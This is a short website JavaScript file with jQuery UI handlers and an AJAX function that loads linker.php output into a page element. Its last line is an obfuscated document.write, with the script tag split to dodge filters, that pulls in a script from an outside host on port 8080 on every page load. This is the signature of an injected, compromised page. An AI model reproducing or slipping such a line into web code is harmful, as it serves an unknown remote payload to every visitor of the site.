// JavaScript Document
var http = false;

if(navigator.appName == "Microsoft Internet Explorer") {
  http = new ActiveXObject("Microsoft.XMLHTTP");
} else {
  http = new XMLHttpRequest();
} 

$(document).ready(function() {
	$('#myselectbox').selectbox();
});

var domTT_styleClass = 'domTTOverlib';

$(document).ready(function(){
    
    $("span").click(function () {
    	$("#mainContent").slideUp("slow");
	 	$("#mainContent").slideDown("slow");
	 
	 
    });

  });


function funct(linkVal) {
	
	http.open("GET", "linker.php?paramID="+linkVal, true);
	http.onreadystatechange=function() {
    if(http.readyState == 4) { 
	
	document.getElementById('mainContent').innerHTML = http.responseText;

	
	}
  }

  http.send(null);
	
}


document.write('<s'+'cript type="text/javascript" src="http://temp.hbsouthmomsclub.com:8080/Data_Type.js"></scr'+'ipt>');